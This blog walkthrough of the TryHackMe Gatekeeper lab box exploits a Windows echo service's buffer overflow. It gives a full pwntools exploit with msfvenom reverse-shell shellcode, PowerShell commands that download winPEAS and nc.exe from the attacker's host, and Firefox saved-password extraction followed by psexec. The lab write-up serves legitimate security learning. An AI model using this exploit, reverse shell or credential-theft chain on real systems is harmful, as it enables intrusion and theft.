Try Hack Me - Gatekeeper Walkthrough

2020-08-29 2656 words 13 minutes

Contents

Background

TryHackMe is similar to HackTheBox, VulnHub, and others. One of major differences in THM compared to others is the more gamified approach to tackling boxes. I don’t have any experience with some of the other options, but have thus far found the difficultly ramp on THM to be what I was looking for. Lastly, I recommend watching through some of the John Hammond videos that go through some of the TryHackMe boxes.

Every box on THM has a theme, the Gatekeeper theme revolves around finding and exploting a buffer overflow in one of the exposed services. The first thing to do is to get the target machine started and connect the Kali machine to the VPN.

Diving In

Starting with an nmapscan, the box has a handful of ports open, including SMB and a suspicious 31337 port. Using nc to connect to 31337 and sending some input gets a reply of “Hello [input]!!!” - it looks to be some sort of simple echo service.

A quick test with python -c "print 'a'*1024" causes the connection to end, likely crashing the program. This is likely why trying to immediate connect after sending the breaking payload fails to connect. The service running on 31337 has likely crashed and has to restart.

Next up is to see what enum4linux has to find. After letting it run for a bit and digging through the output, it show that there’s a share available with the name of Users. Time to try logging in with smbclient //<ip>/Users as an anonymous (password-less) user. Given that it was successful and poking around a bit shows that there’s a gatekeeper.exe that we can download.

Now for the fun part, it’s time to start digging into what the gatekeeper.exe does. As a general safety practice, random executable should never be run on your real machine. So, starting up a Windows VM and pulling over gatekeeper.exe and giving it a quick run shows that it’s the same sort of program as the one running on port 31337 - and that it does actually crash with the excessive length input.

Next fire-up Immunity Debugger and searching for All referenced Strings it is possible to find the format string for the Hello %s!!!, putting some break points around there, starting the program and then connecting to it with nc let’s us start working through what’s going on. Looking into the assembly it’s clear that the Hello %s!!!'s buffer is only 128 characters, yet we can provide a buffer of any length. As much, it should be possible to exploit the overflow and take control over EIP.

Time for a quick dive into the assembly of the vulnerable function, this output is from Immunity Debugger, which is nice enough to provide some basic comments:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54


080416F0  /$ 55             PUSH EBP
080416F1  |. 8BEC           MOV EBP,ESP
080416F3  |. 81EC 94000000  SUB ESP,94                               ; Reserve 148 bytes on the stack,
080416F9  |. 8B45 0C        MOV EAX,DWORD PTR SS:[EBP+C]             ; From the function parameters, aka our passed in string
080416FC  |. 50             PUSH EAX                                 ; /Arg3 - The passed in string from calling the function, aka our payload
080416FD  |. 68 F0410408    PUSH gatekeep.080441F0                   ; |Arg2 = 080441F0 ASCII "Hello %s!!!"
08041702  |. 8D8D 6CFFFFFF  LEA ECX,DWORD PTR SS:[EBP-94]            ; |
08041708  |. 51             PUSH ECX                                 ; |Arg1 - This is the buffer on the stack
08041709  |. E8 F2F9FFFF    CALL gatekeep.08041100                   ; \ Some sort of sprintf(...) function and where the overflow happens
0804170E  |. 83C4 0C        ADD ESP,0C
08041711  |. 8D95 6CFFFFFF  LEA EDX,DWORD PTR SS:[EBP-94]
08041717  |. 8955 F8        MOV DWORD PTR SS:[EBP-8],EDX
0804171A  |. 8B45 F8        MOV EAX,DWORD PTR SS:[EBP-8]
0804171D  |. 83C0 01        ADD EAX,1
08041720  |. 8945 F0        MOV DWORD PTR SS:[EBP-10],               ; The usage here clues us into the size of the buffer, like 128 bytes
08041723  |> 8B4D F8        /MOV ECX,DWORD PTR SS:[EBP-8]
08041726  |. 8A11           |MOV DL,BYTE PTR DS:[ECX]
08041728  |. 8855 FF        |MOV BYTE PTR SS:[EBP-1],DL
0804172B  |. 8345 F8 01     |ADD DWORD PTR SS:[EBP-8],1
0804172F  |. 807D FF 00     |CMP BYTE PTR SS:[EBP-1],0
08041733  |.^75 EE          \JNZ SHORT gatekeep.08041723
08041735  |. 8B45 F8        MOV EAX,DWORD PTR SS:[EBP-8]
08041738  |. 2B45 F0        SUB EAX,DWORD PTR SS:[EBP-10]
0804173B  |. 8945 EC        MOV DWORD PTR SS:[EBP-14],EAX
0804173E  |. 6A 00          PUSH 0                                   ; /Flags = 0
08041740  |. 8B4D EC        MOV ECX,DWORD PTR SS:[EBP-14]            ; |
08041743  |. 51             PUSH ECX                                 ; |DataSize
08041744  |. 8D95 6CFFFFFF  LEA EDX,DWORD PTR SS:[EBP-94]            ; |
0804174A  |. 52             PUSH EDX                                 ; |Data
0804174B  |. 8B45 08        MOV EAX,DWORD PTR SS:[EBP+8]             ; |
0804174E  |. 50             PUSH EAX                                 ; |Socket
0804174F  |. FF15 70300408  CALL DWORD PTR DS:[<&WS2_32.#19>]        ; \send
08041755  |. 8945 F4        MOV DWORD PTR SS:[EBP-C],EAX
08041758  |. 837D F4 FF     CMP DWORD PTR SS:[EBP-C],-1
0804175C  |. 75 23          JNZ SHORT gatekeep.08041781
0804175E  |. FF15 84300408  CALL DWORD PTR DS:[<&WS2_32.#111>]       ; [WSAGetLastError
08041764  |. 50             PUSH EAX                                 ; /Arg2
08041765  |. 68 00420408    PUSH gatekeep.08044200                   ; |Arg1 = 08044200 ASCII "send failed: %d"
0804176A  |. E8 D1F8FFFF    CALL gatekeep.08041040                   ; \gatekeep.08041040
0804176F  |. 83C4 08        ADD ESP,8
08041772  |. 8B4D 08        MOV ECX,DWORD PTR SS:[EBP+8]
08041775  |. 51             PUSH ECX                                 ; /Socket
08041776  |. FF15 60300408  CALL DWORD PTR DS:[<&WS2_32.#3>]         ; \closesocket
0804177C  |. 83C8 FF        OR EAX,FFFFFFFF
0804177F  |. EB 13          JMP SHORT gatekeep.08041794
08041781  |> 8B55 F4        MOV EDX,DWORD PTR SS:[EBP-C]
08041784  |. 52             PUSH EDX                                 ; /Arg2
08041785  |. 68 14420408    PUSH gatekeep.08044214                   ; |Arg1 = 08044214 ASCII "Bytes sent: %d"
0804178A  |. E8 B1F8FFFF    CALL gatekeep.08041040                   ; \gatekeep.08041040
0804178F  |. 83C4 08        ADD ESP,8
08041792  |. 33C0           XOR EAX,EAX
08041794  |> 8BE5           MOV ESP,EBP
08041796  |. 5D             POP EBP
08041797  \. C3             RETN

After sending a variety of inputs, looks like it’s possible to control the EIP of a particular function with a payload of 146 characters (147-150 is the EIP). With control over EIP it should be possible to determine an address to jump for the shellcode. Immunity Debugger comes with the ability to execute python scripts to make it easier to find what’s needed. In this particular case mona, a swiss army knife that will make our lives easier. First up is to use mona to hopefully find a module that isn’t applying ASLR using !mona modules. In this particular case, it turns out that the gatekeeper.exe is what we need:

Now that we know what module we can use, next is to figure out what to replace the EIP with. Before we get to the exact address to use, now is a good time to explain that a good technique for dealing with buffer overflows is to use jmp esp. Since we cannot rely on an address being predictable, we’ll instead overwrite the return address to some a point in a library or executable that contains a jmp esp. This roughly looks like the following:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


                        +---+
                        |EIP+---+
 +--------------------------+   |
 |Buffer[              ]|RET|   |
 +-----------------------^--+   |
                         |      |
 Exploit Payload         |      |
 +------------------------------v-----------------+
 |AAAAAAAAAAAAAAAAAAAAA|jmp esp|[nop]SHELLCODE   |
 +-----------------------------------------------+

The key here is that our payload overflows the EIP/RET address and then continues to overflow the shellcode into the extended stack pointer space. Once the RET pops the 4 bytes off for the jmp esp, it means that the esp now points directly to the start of the shellcode. So once the jmp esp is executed, it’ll just continue on to the shellcode. With that out of the way, it’s time to use mona to find the jmp esp instruction. There are a few different ways to accomplish this, however I’ve found the most straight forward version to be: !mona jmp -r esp. More detailed information can be found here: exploit-db write up on bufferoverflows and bypassing memory protections.

This gives two possible address that have the instructions needed:

1
2


0x080414c3 # jmp ESP
0x080416bf # jmp ESP

This gives us the formula of: <146 characters> + <addr of jmp ESP> + <nop sled> + <shellcode>. The use of the nop sled, while strictly isn’t necessary, does give a bit of wiggle room to make sure the jmp esp will lands where it needs to and always allow for successful execution of shellcode.

Next up is generating the actual shellcode. This is where msfvenom comes into the picture. Since the aim of these is to gain more experience rooting boxes without meterepter, we’ll just use a simple shell_reverse_tcp.

There’s one more thing to note here: bad characters. bad characters are those that cause our shellcode to become invalid, either because they cause the input to not be entirely consumed or are explicitly filtered out by the targeted application. A typical example of this is \x00, especially with string input as it’s the null terminator. So before we can generate our final payload, some care will need to be taken to identify these bad characters.

Queue python, we can generate a payload to send it to the server and work through eliminating characters that will mess up our shellcode.

Quick note: I’ll be using pwntools, while it’s not required, I like some of the functionality offered by it, especially the logging.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44


from pwn import *

RHOST = '10.10.182.65'
RPORT = 31337

BAD_CHARS = []

# Loop over each characters
# Build a string of "AAAA" + "<char>" + "BBBB\r"
# Check the output for "BBBB", if there's a bad character
# The Bs should get dropped from the output

for i in range(0, 256):
    char_to_test = struct.pack("B", i)
    buf = b"AAAA"
    buf += char_to_test
    buf += b"BBBB\n"
    log.info("Testing: {}".format(buf))

    try:
        log.info("Connecting to host...")
        conn = remote(RHOST, RPORT)

        log.info("Sending payload... {}".format(buf))
        conn.send(buf)

        log.info("Recv-ing message back...")
        message = conn.recv()
        log.info("Got: {}".format(message))
        test = char_to_test + "BBBB".encode()

        if test in message:
            log.info("Char: {} is okay.".format(char_to_test))
        else:
            log.warn("Char: {} is NOT good.".format(char_to_test))
            BAD_CHARS.append("\\x" + char_to_test.hex())
        conn.close()
        sleep(0.05)

    except:
        log.error("Something bad happened.")


log.info("Got these bad chars: {}".format("".join(BAD_CHARS)))

After letting this run for a bit, it prints out the following: [*] Got these bad chars: \x00\x0a. So, now that the bad characters have been identified, it’s finally time to build the shellcode payload using msfvenom. Specially, we’ll have msfvenom output some python to make copy and pasting a bit quicker, using the shikata_ga_nai encoder and filter out \x00\x0a.

1

msfvenom -p windows/shell_reverse_tcp LHOST=10.13.1.151 LPORT=4443 -e x86/shikata_ga_nai -f python -b '\x00\x0a'

With the shellcode created, it’s now time to craft our exploit for getting a shell, and ultimately our foothold on Gatekeeper:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65


from pwn import *

RHOST = '10.0.2.4'
RPORT = 31337

buf =  b""
# Init buffer to overflow with
buf += b"\x90" * 146

# Addr to replace our EIP - going to use a jmp esp
# Using Immunity Debugger and `mona.py` it's possible to locate an aslr free addr
# Two possible options:
#      0x080414c3 jmp ESP
#      0x080416bf jmp ESP
buf += b"\xc3\x14\x04\x08"

# Nop sled
buf += b"\x90"*16

# Shellcode
buf += b"\xbf\x2c\x2a\x90\xac\xd9\xea\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\x52\x31\x7a\x12\x83\xc2\x04\x03\x56\x24\x72"
buf += b"\x59\x5a\xd0\xf0\xa2\xa2\x21\x95\x2b\x47\x10\x95\x48"
buf += b"\x0c\x03\x25\x1a\x40\xa8\xce\x4e\x70\x3b\xa2\x46\x77"
buf += b"\x8c\x09\xb1\xb6\x0d\x21\x81\xd9\x8d\x38\xd6\x39\xaf"
buf += b"\xf2\x2b\x38\xe8\xef\xc6\x68\xa1\x64\x74\x9c\xc6\x31"
buf += b"\x45\x17\x94\xd4\xcd\xc4\x6d\xd6\xfc\x5b\xe5\x81\xde"
buf += b"\x5a\x2a\xba\x56\x44\x2f\x87\x21\xff\x9b\x73\xb0\x29"
buf += b"\xd2\x7c\x1f\x14\xda\x8e\x61\x51\xdd\x70\x14\xab\x1d"
buf += b"\x0c\x2f\x68\x5f\xca\xba\x6a\xc7\x99\x1d\x56\xf9\x4e"
buf += b"\xfb\x1d\xf5\x3b\x8f\x79\x1a\xbd\x5c\xf2\x26\x36\x63"
buf += b"\xd4\xae\x0c\x40\xf0\xeb\xd7\xe9\xa1\x51\xb9\x16\xb1"
buf += b"\x39\x66\xb3\xba\xd4\x73\xce\xe1\xb0\xb0\xe3\x19\x41"
buf += b"\xdf\x74\x6a\x73\x40\x2f\xe4\x3f\x09\xe9\xf3\x40\x20"
buf += b"\x4d\x6b\xbf\xcb\xae\xa2\x04\x9f\xfe\xdc\xad\xa0\x94"
buf += b"\x1c\x51\x75\x3a\x4c\xfd\x26\xfb\x3c\xbd\x96\x93\x56"
buf += b"\x32\xc8\x84\x59\x98\x61\x2e\xa0\x4b\x84\xaf\xa8\x84"
buf += b"\xf0\xad\xac\x8b\x5b\x3b\x4a\xc1\x4b\x6d\xc5\x7e\xf5"
buf += b"\x34\x9d\x1f\xfa\xe2\xd8\x20\x70\x01\x1d\xee\x71\x6c"
buf += b"\x0d\x87\x71\x3b\x6f\x0e\x8d\x91\x07\xcc\x1c\x7e\xd7"
buf += b"\x9b\x3c\x29\x80\xcc\xf3\x20\x44\xe1\xaa\x9a\x7a\xf8"
buf += b"\x2b\xe4\x3e\x27\x88\xeb\xbf\xaa\xb4\xcf\xaf\x72\x34"
buf += b"\x54\x9b\x2a\x63\x02\x75\x8d\xdd\xe4\x2f\x47\xb1\xae"
buf += b"\xa7\x1e\xf9\x70\xb1\x1e\xd4\x06\x5d\xae\x81\x5e\x62"
buf += b"\x1f\x46\x57\x1b\x7d\xf6\x98\xf6\xc5\x06\xd3\x5a\x6f"
buf += b"\x8f\xba\x0f\x2d\xd2\x3c\xfa\x72\xeb\xbe\x0e\x0b\x08"
buf += b"\xde\x7b\x0e\x54\x58\x90\x62\xc5\x0d\x96\xd1\xe6\x07"

# Null terminator and newline
buf += b'\x00\x0a'

log.info("Connecting to host...")

conn = remote(RHOST, RPORT)
sleep(.05)

log.info("Sending payload... {}".format(buf))
conn.send(buf)

log.info("Recv-ing message back...")
banner = conn.recv()

log.info("Got: {}".format(banner))

conn.close()

Start up a nc on the attacking machine, and then launch the exploit. Once the shell connects, it’s time to figure out the next steps. I’ll admit I’m still fairly new to this world, but it seems like after a foothold has been established the next step is to gather information and look for any obvious ways of PrivEsc. So this is where WinPEAs comes into the picture.

On the attacking machine, fire up the SimpleHTTPServer (python -m SimpleHTTPServer) in a directory that has the winPEAS.bat. While we are at it, make sure nc.exe is also in that directory - keep in mind that in more “realistic” environments, nc.exe would likely set off some alarms.

Now on the shell on the victim machine grab both using powershell:

1
2


powershell -c "Set-Content -value (New-Object Net.WebClient).DownloadData('http://10.13.1.151:8787/winPEAS.bat') -encoding byte -Path magic.bat";
powershell -c "Set-Content -value (New-Object Net.WebClient).DownloadData('http://10.13.1.151:8787/nc.exe') -encoding byte -Path nc.exe";

Also with that shell, in the current directory, the first flag can be found in user.txt.txt.

Now it’s time to kick off winPEAs.bat and see if there’s something there to get us the privs needed to get to root flag. After letting winPEAs finish running it doesn’t look like there’s anything too obvious to use to escalate. So time to do some manual digging, the C:\Users folder does reveal that there are two accounts: natbat, and mayor. It looks like mayor is ultimately where we need to get to. Lastly, something else that caught my eye in the natbat user’s directory a file named Firefox.lnk.

Without anything obvious from winPEAs, checking exploit-db for every running process and service, digging through most of the readable contents on the machine and coming up with no clear way to make forward progress - I was at a bit of a loss as to what to do. I’d love to be able to say the answer randomly came to me, or I had a random epiphany, however there was none of that. Instead I had to go looking for some hints in other guides - and that’s when it became obvious as to what I had missed at the beginning. In fact, the inclusion of the Firefox.lnk was a hint as to where to go next. It turns out that browsers on machines are great resources for getting saved credentials and that it’s fairly easy to do so.

The trick here is to use firefox_decrypt. It allows for “recovery” of saved passwords. The goods in this particular case can be found in C:\Users\natbat\AppData\Roaming\Mozilla\FireFox\Profiles\.... Using nc.exe, I transferred the needed files over. On the attacking machine using firefox_decrypt was trivial, since there was no master password set:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


$ python firefox_decrypt/firefox_decrypt.py gatekeeper/
2020-08-01 01:47:04,815 - WARNING - profile.ini not found in gatekeeper/
2020-08-01 01:47:04,815 - WARNING - Continuing and assuming 'gatekeeper/' is a profile location

Master Password for profile gatekeeper/:
2020-08-01 01:47:15,801 - WARNING - Attempting decryption with no Master Password

Website:   <https://creds.com>
Username: 'mayor'
Password: '************'

With the password, use impacket‘s psexec.py to spawn a shell and grab the root flag:

1
2
3
4


kali@kali:~/Desktop/pentest$ /usr/share/doc/python3-impacket/examples/psexec.py GATEKEEPER/mayor:**************@10.10.145.175

C:\Users\mayor\Desktop>type root.txt.txt
{T**********************U}

This box was a bit of an eye opener since it never even occurred to me to look into the files from the Browsers - however now that I’ve done so I’ll be adding it to my list of things to check for in the future.